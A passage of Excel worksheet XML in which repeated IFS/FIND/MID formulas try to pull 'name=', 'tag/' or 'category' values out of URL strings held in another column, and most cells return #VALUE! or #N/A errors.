    ISNUMBER(FIND("name=",$A1171)), MID($A1171, FIND("name=",$A1171) + 5, LEN($A1171) - FIND("name=",$A1171)),
    ISNUMBER(FIND("tag/",$A1171)), MID($A1171, FIND("tag/",$A1171) + 4, LEN($A1171) - FIND("tag/",$A1171)),
    ISNUMBER(FIND("category",$A1171)), MID($A1171, FIND("category",$A1171) + 9, LEN($A1171) - FIND("category",$A1171)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1171" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1172" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1172" t="s">
        <v>2248</v>
      </c>
      <c r="B1172" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1172" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1172" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1172" t="e" cm="1">
        <f t="array" ref="E1172">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1172)), MID($A1172, FIND("name=",$A1172) + 5, LEN($A1172) - FIND("name=",$A1172)),
    ISNUMBER(FIND("tag/",$A1172)), MID($A1172, FIND("tag/",$A1172) + 4, LEN($A1172) - FIND("tag/",$A1172)),
    ISNUMBER(FIND("category",$A1172)), MID($A1172, FIND("category",$A1172) + 9, LEN($A1172) - FIND("category",$A1172)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1172" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1173" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1173" t="s">
        <v>2270</v>
      </c>
      <c r="B1173" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1173" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1173" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1173" t="e" cm="1">
        <f t="array" ref="E1173">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1173)), MID($A1173, FIND("name=",$A1173) + 5, LEN($A1173) - FIND("name=",$A1173)),
    ISNUMBER(FIND("tag/",$A1173)), MID($A1173, FIND("tag/",$A1173) + 4, LEN($A1173) - FIND("tag/",$A1173)),
    ISNUMBER(FIND("category",$A1173)), MID($A1173, FIND("category",$A1173) + 9, LEN($A1173) - FIND("category",$A1173)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1173" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1174" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1174" t="s">
        <v>2270</v>
      </c>
      <c r="B1174" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1174" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1174" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1174" t="e" cm="1">
        <f t="array" ref="E1174">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1174)), MID($A1174, FIND("name=",$A1174) + 5, LEN($A1174) - FIND("name=",$A1174)),
    ISNUMBER(FIND("tag/",$A1174)), MID($A1174, FIND("tag/",$A1174) + 4, LEN($A1174) - FIND("tag/",$A1174)),
    ISNUMBER(FIND("category",$A1174)), MID($A1174, FIND("category",$A1174) + 9, LEN($A1174) - FIND("category",$A1174)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1174" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1175" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1175" t="s">
        <v>2270</v>
      </c>
      <c r="B1175" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1175" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1175" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1175" t="e" cm="1">
        <f t="array" ref="E1175">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1175)), MID($A1175, FIND("name=",$A1175) + 5, LEN($A1175) - FIND("name=",$A1175)),
    ISNUMBER(FIND("tag/",$A1175)), MID($A1175, FIND("tag/",$A1175) + 4, LEN($A1175) - FIND("tag/",$A1175)),
    ISNUMBER(FIND("category",$A1175)), MID($A1175, FIND("category",$A1175) + 9, LEN($A1175) - FIND("category",$A1175)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1175" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1176" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1176" t="s">
        <v>2368</v>
      </c>
      <c r="B1176" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1176" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1176" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1176" t="e" cm="1">
        <f t="array" ref="E1176">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1176)), MID($A1176, FIND("name=",$A1176) + 5, LEN($A1176) - FIND("name=",$A1176)),
    ISNUMBER(FIND("tag/",$A1176)), MID($A1176, FIND("tag/",$A1176) + 4, LEN($A1176) - FIND("tag/",$A1176)),
    ISNUMBER(FIND("category",$A1176)), MID($A1176, FIND("category",$A1176) + 9, LEN($A1176) - FIND("category",$A1176)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1176" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1177" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1177" t="s">
        <v>2369</v>
      </c>
      <c r="B1177" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1177" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1177" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1177" t="e" cm="1">
        <f t="array" ref="E1177">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1177)), MID($A1177, FIND("name=",$A1177) + 5, LEN($A1177) - FIND("name=",$A1177)),
    ISNUMBER(FIND("tag/",$A1177)), MID($A1177, FIND("tag/",$A1177) + 4, LEN($A1177) - FIND("tag/",$A1177)),
    ISNUMBER(FIND("category",$A1177)), MID($A1177, FIND("category",$A1177) + 9, LEN($A1177) - FIND("category",$A1177)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1177" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1178" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1178" t="s">
        <v>2418</v>
      </c>
      <c r="B1178" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1178" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1178" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1178" t="e" cm="1">
        <f t="array" ref="E1178">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1178)), MID($A1178, FIND("name=",$A1178) + 5, LEN($A1178) - FIND("name=",$A1178)),
    ISNUMBER(FIND("tag/",$A1178)), MID($A1178, FIND("tag/",$A1178) + 4, LEN($A1178) - FIND("tag/",$A1178)),
    ISNUMBER(FIND("category",$A1178)), MID($A1178, FIND("category",$A1178) + 9, LEN($A1178) - FIND("category",$A1178)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1178" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1179" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1179" t="s">
        <v>2269</v>
      </c>
      <c r="B1179" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1179" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1179" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1179" t="e" cm="1">
        <f t="array" ref="E1179">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1179)), MID($A1179, FIND("name=",$A1179) + 5, LEN($A1179) - FIND("name=",$A1179)),
    ISNUMBER(FIND("tag/",$A1179)), MID($A1179, FIND("tag/",$A1179) + 4, LEN($A1179) - FIND("tag/",$A1179)),
    ISNUMBER(FIND("category",$A1179)), MID($A1179, FIND("category",$A1179) + 9, LEN($A1179) - FIND("category",$A1179)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1179" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1180" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1180" t="s">
        <v>2537</v>
      </c>
      <c r="B1180" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1180" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1180" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1180" t="e" cm="1">
        <f t="array" ref="E1180">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1180)), MID($A1180, FIND("name=",$A1180) + 5, LEN($A1180) - FIND("name=",$A1180)),
    ISNUMBER(FIND("tag/",$A1180)), MID($A1180, FIND("tag/",$A1180) + 4, LEN($A1180) - FIND("tag/",$A1180)),
    ISNUMBER(FIND("category",$A1180)), MID($A1180, FIND("category",$A1180) + 9, LEN($A1180) - FIND("category",$A1180)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1180" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1181" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1181" t="s">
        <v>2538</v>
      </c>
      <c r="B1181" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1181" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1181" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1181" t="e" cm="1">
        <f t="array" ref="E1181">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1181)), MID($A1181, FIND("name=",$A1181) + 5, LEN($A1181) - FIND("name=",$A1181)),
    ISNUMBER(FIND("tag/",$A1181)), MID($A1181, FIND("tag/",$A1181) + 4, LEN($A1181) - FIND("tag/",$A1181)),
    ISNUMBER(FIND("category",$A1181)), MID($A1181, FIND("category",$A1181) + 9, LEN($A1181) - FIND("category",$A1181)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1181" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1182" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1182" t="s">
        <v>2270</v>
      </c>
      <c r="B1182" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1182" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1182" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1182" t="e" cm="1">
        <f t="array" ref="E1182">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1182)), MID($A1182, FIND("name=",$A1182) + 5, LEN($A1182) - FIND("name=",$A1182)),
    ISNUMBER(FIND("tag/",$A1182)), MID($A1182, FIND("tag/",$A1182) + 4, LEN($A1182) - FIND("tag/",$A1182)),
    ISNUMBER(FIND("category",$A1182)), MID($A1182, FIND("category",$A1182) + 9, LEN($A1182) - FIND("category",$A1182)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1182" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1183" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1183" t="s">
        <v>2539</v>
      </c>
      <c r="B1183" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1183" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1183" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1183" t="e" cm="1">
        <f t="array" ref="E1183">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1183)), MID($A1183, FIND("name=",$A1183) + 5, LEN($A1183) - FIND("name=",$A1183)),
    ISNUMBER(FIND("tag/",$A1183)), MID($A1183, FIND("tag/",$A1183) + 4, LEN($A1183) - FIND("tag/",$A1183)),
    ISNUMBER(FIND("category",$A1183)), MID($A1183, FIND("category",$A1183) + 9, LEN($A1183) - FIND("category",$A1183)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1183" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1184" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1184" t="s">
        <v>2271</v>
      </c>
      <c r="B1184" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1184" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1184" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1184" t="e" cm="1">
        <f t="array" ref="E1184">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1184)), MID($A1184, FIND("name=",$A1184) + 5, LEN($A1184) - FIND("name=",$A1184)),
    ISNUMBER(FIND("tag/",$A1184)), MID($A1184, FIND("tag/",$A1184) + 4, LEN($A1184) - FIND("tag/",$A1184)),
    ISNUMBER(FIND("category",$A1184)), MID($A1184, FIND("category",$A1184) + 9, LEN($A1184) - FIND("category",$A1184)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1184" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1185" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1185" t="s">
        <v>2269</v>
      </c>
      <c r="B1185" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1185" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1185" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1185" t="e" cm="1">
        <f t="array" ref="E1185">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1185)), MID($A1185, FIND("name=",$A1185) + 5, LEN($A1185) - FIND("name=",$A1185)),
    ISNUMBER(FIND("tag/",$A1185)), MID($A1185, FIND("tag/",$A1185) + 4, LEN($A1185) - FIND("tag/",$A1185)),
    ISNUMBER(FIND("category",$A1185)), MID($A1185, FIND("category",$A1185) + 9, LEN($A1185) - FIND("category",$A1185)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1185" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1186" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1186" t="s">
        <v>2537</v>
      </c>
      <c r="B1186" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1186" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1186" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1186" t="e" cm="1">
        <f t="array" ref="E1186">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1186)), MID($A1186, FIND("name=",$A1186) + 5, LEN($A1186) - FIND("name=",$A1186)),
    ISNUMBER(FIND("tag/",$A1186)), MID($A1186, FIND("tag/",$A1186) + 4, LEN($A1186) - FIND("tag/",$A1186)),
    ISNUMBER(FIND("category",$A1186)), MID($A1186, FIND("category",$A1186) + 9, LEN($A1186) - FIND("category",$A1186)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1186" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1187" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1187" t="s">
        <v>2538</v>
      </c>
      <c r="B1187" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1187" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1187" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1187" t="e" cm="1">
        <f t="array" ref="E1187">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1187)), MID($A1187, FIND("name=",$A1187) + 5, LEN($A1187) - FIND("name=",$A1187)),
    ISNUMBER(FIND("tag/",$A1187)), MID($A1187, FIND("tag/",$A1187) + 4, LEN($A1187) - FIND("tag/",$A1187)),
    ISNUMBER(FIND("category",$A1187)), MID($A1187, FIND("category",$A1187) + 9, LEN($A1187) - FIND("category",$A1187)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1187" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1188" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1188" t="s">
        <v>2270</v>
      </c>
      <c r="B1188" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1188" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1188" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1188" t="e" cm="1">
        <f t="array" ref="E1188">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1188)), MID($A1188, FIND("name=",$A1188) + 5, LEN($A1188) - FIND("name=",$A1188)),
    ISNUMBER(FIND("tag/",$A1188)), MID($A1188, FIND("tag/",$A1188) + 4, LEN($A1188) - FIND("tag/",$A1188)),
    ISNUMBER(FIND("category",$A1188)), MID($A1188, FIND("category",$A1188) + 9, LEN($A1188) - FIND("category",$A1188)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1188" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1189" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1189" t="s">
        <v>2539</v>
      </c>
      <c r="B1189" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1189" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1189" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1189" t="e" cm="1">
        <f t="array" ref="E1189">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1189)), MID($A1189, FIND("name=",$A1189) + 5, LEN($A1189) - FIND("name=",$A1189)),
    ISNUMBER(FIND("tag/",$A1189)), MID($A1189, FIND("tag/",$A1189) + 4, LEN($A1189) - FIND("tag/",$A1189)),
    ISNUMBER(FIND("category",$A1189)), MID($A1189, FIND("category",$A1189) + 9, LEN($A1189) - FIND("category",$A1189)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1189" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1190" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1190" t="s">
        <v>2271</v>
      </c>
      <c r="B1190" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1190" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1190" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1190" t="e" cm="1">
        <f t="array" ref="E1190">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1190)), MID($A1190, FIND("name=",$A1190) + 5, LEN($A1190) - FIND("name=",$A1190)),
    ISNUMBER(FIND("tag/",$A1190)), MID($A1190, FIND("tag/",$A1190) + 4, LEN($A1190) - FIND("tag/",$A1190)),
    ISNUMBER(FIND("category",$A1190)), MID($A1190, FIND("category",$A1190) + 9, LEN($A1190) - FIND("category",$A1190)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1190" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1191" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1191" t="s">
        <v>2368</v>
      </c>
      <c r="B1191" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1191" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1191" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1191" t="e" cm="1">
        <f t="array" ref="E1191">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1191)), MID($A1191, FIND("name=",$A1191) + 5, LEN($A1191) - FIND("name=",$A1191)),
    ISNUMBER(FIND("tag/",$A1191)), MID($A1191, FIND("tag/",$A1191) + 4, LEN($A1191) - FIND("tag/",$A1191)),
    ISNUMBER(FIND("category",$A1191)), MID($A1191, FIND("category",$A1191) + 9, LEN($A1191) - FIND("category",$A1191)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1191" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1192" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1192" t="s">
        <v>2377</v>
      </c>
      <c r="B1192" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1192" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1192" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1192" t="e" cm="1">
        <f t="array" ref="E1192">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1192)), MID($A1192, FIND("name=",$A1192) + 5, LEN($A1192) - FIND("name=",$A1192)),
    ISNUMBER(FIND("tag/",$A1192)), MID($A1192, FIND("tag/",$A1192) + 4, LEN($A1192) - FIND("tag/",$A1192)),
    ISNUMBER(FIND("category",$A1192)), MID($A1192, FIND("category",$A1192) + 9, LEN($A1192) - FIND("category",$A1192)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1192" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1193" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1193" t="s">
        <v>2403</v>
      </c>
      <c r="B1193" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1193" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1193" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1193" t="e" cm="1">
        <f t="array" ref="E1193">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1193)), MID($A1193, FIND("name=",$A1193) + 5, LEN($A1193) - FIND("name=",$A1193)),
    ISNUMBER(FIND("tag/",$A1193)), MID($A1193, FIND("tag/",$A1193) + 4, LEN($A1193) - FIND("tag/",$A1193)),
    ISNUMBER(FIND("category",$A1193)), MID($A1193, FIND("category",$A1193) + 9, LEN($A1193) - FIND("category",$A1193)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1193" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1194" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1194" t="s">
        <v>2346</v>
      </c>
      <c r="B1194" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1194" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1194" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1194" t="e" cm="1">
        <f t="array" ref="E1194">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1194)), MID($A1194, FIND("name=",$A1194) + 5, LEN($A1194) - FIND("name=",$A1194)),
    ISNUMBER(FIND("tag/",$A1194)), MID($A1194, FIND("tag/",$A1194) + 4, LEN($A1194) - FIND("tag/",$A1194)),
    ISNUMBER(FIND("category",$A1194)), MID($A1194, FIND("category",$A1194) + 9, LEN($A1194) - FIND("category",$A1194)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1194" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1195" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1195" t="s">
        <v>2377</v>
      </c>
      <c r="B1195" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1195" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1195" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1195" t="e" cm="1">
        <f t="array" ref="E1195">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1195)), MID($A1195, FIND("name=",$A1195) + 5, LEN($A1195) - FIND("name=",$A1195)),
    ISNUMBER(FIND("tag/",$A1195)), MID($A1195, FIND("tag/",$A1195) + 4, LEN($A1195) - FIND("tag/",$A1195)),
    ISNUMBER(FIND("category",$A1195)), MID($A1195, FIND("category",$A1195) + 9, LEN($A1195) - FIND("category",$A1195)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1195" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1196" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1196" t="s">
        <v>2269</v>
      </c>
      <c r="B1196" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1196" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1196" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1196" t="e" cm="1">
        <f t="array" ref="E1196">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1196)), MID($A1196, FIND("name=",$A1196) + 5, LEN($A1196) - FIND("name=",$A1196)),
    ISNUMBER(FIND("tag/",$A1196)), MID($A1196, FIND("tag/",$A1196) + 4, LEN($A1196) - FIND("tag/",$A1196)),
    ISNUMBER(FIND("category",$A1196)), MID($A1196, FIND("category",$A1196) + 9, LEN($A1196) - FIND("category",$A1196)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1196" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1197" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1197" t="s">
        <v>2270</v>
      </c>
      <c r="B1197" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1197" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1197" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1197" t="e" cm="1">
        <f t="array" ref="E1197">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1197)), MID($A1197, FIND("name=",$A1197) + 5, LEN($A1197) - FIND("name=",$A1197)),
    ISNUMBER(FIND("tag/",$A1197)), MID($A1197, FIND("tag/",$A1197) + 4, LEN($A1197) - FIND("tag/",$A1197)),
    ISNUMBER(FIND("category",$A1197)), MID($A1197, FIND("category",$A1197) + 9, LEN($A1197) - FIND("category",$A1197)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1197" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1198" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1198" t="s">
        <v>2390</v>
      </c>
      <c r="B1198" t="str">
        <f t="shared" si="55"/>
        <v>ova.html&amp;a=vx000&amp;dstr=@Ovatools</v>
      </c>
      <c r="C1198" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1198" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1198" t="str" cm="1">
        <f t="array" ref="E1198">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1198)), MID($A1198, FIND("name=",$A1198) + 5, LEN($A1198) - FIND("name=",$A1198)),
    ISNUMBER(FIND("tag/",$A1198)), MID($A1198, FIND("tag/",$A1198) + 4, LEN($A1198) - FIND("tag/",$A1198)),
    ISNUMBER(FIND("category",$A1198)), MID($A1198, FIND("category",$A1198) + 9, LEN($A1198) - FIND("category",$A1198)))</f>
        <v>ova.html&amp;a=vx000&amp;dstr=@Ovatools</v>
      </c>
      <c r="F1198" t="s">
        <v>3349</v>
      </c>
    </row>
    <row r="1199" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1199" t="s">
        <v>2535</v>
      </c>
      <c r="B1199" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1199" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1199" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1199" t="e" cm="1">
        <f t="array" ref="E1199">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1199)), MID($A1199, FIND("name=",$A1199) + 5, LEN($A1199) - FIND("name=",$A1199)),
    ISNUMBER(FIND("tag/",$A1199)), MID($A1199, FIND("tag/",$A1199) + 4, LEN($A1199) - FIND("tag/",$A1199)),
    ISNUMBER(FIND("category",$A1199)), MID($A1199, FIND("category",$A1199) + 9, LEN($A1199) - FIND("category",$A1199)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1199" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1200" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1200" t="s">
        <v>2536</v>
      </c>
      <c r="B1200" t="e">
        <f t="shared" si="55"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1200" t="e">
        <f t="shared" si="56"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1200" t="e">
        <f t="shared" si="57"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1200" t="e" cm="1">
        <f t="array" ref="E1200">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1200)), MID($A1200, FIND("name=",$A1200) + 5, LEN($A1200) - FIND("name=",$A1200)),
    ISNUMBER(FIND("tag/",$A1200)), MID($A1200, FIND("tag/",$A1200) + 4, LEN($A1200) - FIND("tag/",$A1200)),
    ISNUMBER(FIND("category",$A1200)), MID($A1200, FIND("category",$A1200) + 9, LEN($A1200) - FIND("category",$A1200)))</f>
        <v>#N/A</v>
      </c>
